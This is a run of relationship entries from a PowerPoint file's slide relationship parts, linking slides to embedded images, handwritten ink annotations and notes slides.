Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image450.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image437.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink829.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink835.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image454.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image434.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink824.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image439.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image443.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink833.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image447.emf"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink837.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink841.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image456.emf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image436.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink821.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image438.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink828.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink832.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink836.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image451.emf"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image455.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image442.emf"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink840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846.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image462.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image459.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink848.xm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45.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image461.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image458.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink847.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink844.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image460.e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4.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink853.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image464.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink850.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image430.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink855.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide118.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46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5.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink852.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink849.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink854.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image415.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink851.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image457.e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emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink861.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image473.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image477.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink856.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink865.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink858.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image470.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink863.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink867.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide119.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image472.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47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7.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink860.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image476.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink857.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink862.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink866.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image478.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image469.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink864.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image466.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink859.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image471.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image475.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink86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9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customXml" Target="../ink/ink50.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5110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1.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink869.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink871.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image483.emf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0.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink873.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink870.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image482.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image479.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink87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876.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4030.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink881.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3410.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink878.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4070.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide125.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink88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75.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4010.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3300.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4040.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink877.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4090.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink874.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4000.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink87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customXml" Target="../ink/ink884.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image485.emf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83.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image487.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image484.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink885.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink882.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image486.emf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customXml" Target="../ink/ink888.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image489.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4290.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink890.xml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87.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4310.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4280.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image490.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink889.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink886.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4300.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink891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894.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4360.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4330.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink896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93.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4350.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4320.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink895.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink892.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4340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897.xml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4.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink89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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4500.emf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00.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4490.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink899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customXml" Target="../ink/ink903.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4550.emf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02.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4570.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4540.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink904.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink901.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4560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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4600.emf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06.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4590.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink905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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4630.emf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08.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4620.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink90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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4660.emf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0.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4650.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink909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customXml" Target="../ink/ink913.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4720.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4690.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink915.xml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2.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4220.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4680.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink914.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink911.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4700.emf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customXml" Target="../ink/ink918.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4780.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink923.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4750.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink920.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4800.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide142.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink92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7.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4770.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4740.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4790.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink919.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4812.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink916.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4760.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink92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40.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink929.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink924.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink926.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4860.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide144.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48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30.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink928.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink925.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink930.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4850.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4820.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink927.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4870.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14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36.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image496.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image500.emf"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink949.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink940.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image504.emf"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image508.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink933.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide145.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image495.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image497.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink944.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink9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00.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink935.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image499.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image503.emf"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink948.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image507.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink932.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink937.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink941.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image501.emf"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image505.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4920.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink939.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink945.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4670.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4890.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink934.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4940.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image498.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink943.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image502.emf"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink947.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink951.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image491.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink931.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image493.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink938.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink942.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink946.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image506.emf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emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink957.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image516.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink952.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink961.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink954.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image513.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink959.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide146.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image515.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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0.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink956.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink953.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink958.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink960.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image509.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink955.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image514.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51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customXml" Target="../ink/ink51.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink53.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" 